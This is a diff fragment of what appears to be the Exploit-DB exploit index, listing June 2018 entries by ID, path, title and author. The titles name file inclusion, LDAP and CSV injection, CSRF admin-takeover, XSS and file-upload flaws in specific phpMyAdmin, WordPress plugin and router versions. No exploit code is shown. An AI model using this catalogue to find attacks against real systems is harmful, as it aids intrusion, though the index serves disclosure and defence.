+44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)",2018-06-21,ChaMd5,webapps,php,80
 44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80
-44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - Local File Inclusion",2018-06-22,VulnSpy,webapps,php,80
+44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)",2018-06-22,VulnSpy,webapps,php,80
+44931,exploits/php/webapps/44931.txt,"WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80
+44932,exploits/linux/webapps/44932.txt,"Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,linux,443
+44933,exploits/hardware/webapps/44933.txt,"Intex Router N-150 - Cross-Site Request Forgery (Add Admin)",2018-06-25,"Samrat Das",webapps,hardware,80
+44935,exploits/hardware/webapps/44935.txt,"DIGISOL DG-BR4000NG - Cross-Site Scripting",2018-06-25,"Adipta Basu",webapps,hardware,80
+44936,exploits/hardware/webapps/44936.txt,"Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443
+44937,exploits/hardware/webapps/44937.txt,"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)",2018-06-25,Wadeek,webapps,hardware,80
+44938,exploits/hardware/webapps/44938.txt,"Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443
+44939,exploits/hardware/webapps/44939.txt,"Intex Router N-150 - Arbitrary File Upload",2018-06-25,"Samrat Das",webapps,hardware,
+44940,exploits/php/webapps/44940.txt,"WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80